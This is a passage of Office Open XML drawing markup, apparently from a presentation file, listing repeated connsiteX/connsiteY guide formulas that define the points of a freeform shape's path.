              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1686480"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1686480"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1686480"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1686480"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1686480"/>
              <a:gd name="connsiteX20" fmla="*/ 3420071 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1283042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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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20071 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1283042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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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14737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14737 h 1686480"/>
              <a:gd name="connsiteX5" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1494730 h 1686480"/>
              <a:gd name="connsiteX6" fmla="*/ 1488946 w 9288370"/>
